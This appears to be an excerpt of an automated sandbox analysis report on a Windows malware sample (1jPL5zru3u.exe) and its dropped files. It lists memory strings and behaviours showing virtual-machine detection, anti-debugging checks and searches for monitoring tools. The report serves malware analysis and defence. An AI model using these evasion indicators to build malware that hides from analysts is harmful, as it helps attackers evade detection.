Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: vmware
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000D.00000002.2373129354.0000000000D9D000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.000000000101C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ~VirtualMachineTypes
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.000000000101C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.000000000101C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: CAEHDBAAEC.exe, 00000006.00000002.1925142002.000000000072D000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000A.00000002.2898993813.0000000000D9D000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000B.00000002.1962533242.0000000000D9D000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000D.00000002.2373129354.0000000000D9D000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001A49000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000A.00000002.2897406345.00000000007F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VBoxService.exe
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VMWare
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\1jPL5zru3u.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_04C200B1 Start: 04C205B4 End: 04C200CA 10_2_04C200B1
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
